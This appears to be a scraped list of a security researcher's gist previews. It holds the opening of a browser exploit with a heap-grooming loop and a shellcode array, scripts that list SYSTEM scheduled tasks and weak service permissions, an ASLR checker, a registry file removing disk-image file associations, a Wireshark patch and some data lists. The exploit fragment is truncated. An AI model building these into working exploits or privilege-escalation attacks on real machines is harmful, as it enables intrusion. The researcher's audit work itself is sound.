wdormann

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }

let shellcode = [

// Move x18 to x28 (TEB)

wdormann

$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
if (-Not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
  Write-Warning "We don't have elevated privileges. The following results may not be complete."
}
schtasks /query /fo csv -v | ConvertFrom-Csv | ? {$_.Status -notlike "Disabled" -and $_.TaskName -notlike "\Microsoft\Windows\*" -and $_.TaskName -notlike "\Microsoft\Office\*" -and $_.TaskName -notlike "\Microsoft\XblGameSave\*" -and $_.TaskName -notlike "TaskName" -and ($_."Run As User" -like "*system" -or  $_."Run As User" -like "Administrator*")} | fl taskname,"Comment","Task To Run","Run As User"

wdormann

$win10_builtin = @('AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service',
           'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense',
           'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService',
           'TrustedInstaller', 'UevAgentService', 'vds', 'VSS', 'wbengine', 'WinDefend', 'wmiApSrv',
           'WSearch', 'XboxNetApiSvc', 'XboxGipSvc', 'XblGameSave', 'XblAuthManager', 'WwanSvc', 'wuauserv',
           'WwanSvc', 'wuauserv', 'WpnService', 'WPDBusEnum', 'WpcMonSvc', 'WManSvc', 'wlidsvc', 'WlanSvc',
           'wisvc', 'Winmgmt', 'WiaRpc', 'WerSvc', 'wercplsupport', 'WdiSystemHost', 'WbioSrvc', 'WalletService',
           'WaaSMedicSvc', 'vmvss', 'vmicvss', 'vmicvmsession', 'vmicshutdown', 'vmicrdv', 'vmickvpexchange',
           'vmicheartbeat', 'vmicguestinterface', 'VaultSvc', 'UsoSvc', 'UserManager', 'UmRdpService',
           'TroubleshootingSvc', 'TrkWks', 'TokenBroker', 'Themes', 'TabletInputService',

wdormann

# Don't use this version!
# Try https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c instead
#
# Utility for listing SYSTEM-privileged scheduled tasks on Windows
# Tasks that come with Windows 10 are not included.
# Admin privileges are required to list all scheduled tasks.

import csv
import subprocess
import tempfile

wdormann

# DON'T USE THIS VERSION!
# Try https://gist.github.com/wdormann/89ed779933fe205fb52ecf3eacf5ff40 instead

import os
import subprocess

# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/

svcinfo = {}
FNULL = open(os.devnull, 'w')

wdormann

#!/usr/bin/env python

'''
Utility to check for processes running with non-ASLR-compatible components.
Run with Administrative privileges to get visibility into all processes.

(1a) psutil: https://pypi.org/project/psutil/
    Installed via PIP
-OR-
(1b) Sysinternals ListDLLs: https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls

wdormann

com.whatsapp 1000000000
com.lenovo.anyshare.gps 1000000000
com.instagram.android 1000000000
com.zhiliaoapp.musically 500000000
com.viber.voip 500000000
wp.wattpad 100000000
vStudio.Android.Camera360 100000000
vsin.t16_funny_photo 100000000
com.yahoo.mobile.client.android.mail 100000000

wdormann

Windows Registry Editor Version 5.00

[-HKEY_CLASSES_ROOT\.iso]

[-HKEY_CLASSES_ROOT\.img]

[-HKEY_CLASSES_ROOT\.vhdx]

[-HKEY_CLASSES_ROOT\.vhd]

wdormann

--- packet-tpkt.c.orig  2019-06-21 14:47:47.831026881 +0000
+++ packet-tpkt.c       2019-06-21 15:05:31.115056289 +0000
@@ -22,6 +22,7 @@
 #include <epan/show_exception.h>
 #include "packet-tpkt.h"
+#include "packet-tls.h"
 void proto_register_tpkt(void);
 void proto_reg_handoff_tpkt(void);
@@ -42,6 +43,7 @@
 static gboolean tpkt_desegment = TRUE;

wdormann

AMPAK Technology, Inc.
ASUSTek COMPUTER INC.
AzureWave Technology Inc.
BizLink (Kunshan) Co.,Ltd
Chicony Electronics Co., Ltd.
Digital Data Communications Asia Co.,Ltd
GOOD WAY IND. CO., LTD.
HUAWEI TECHNOLOGIES CO.,LTD
Hon Hai Precision Ind. Co.,Ltd.
Intel Corporate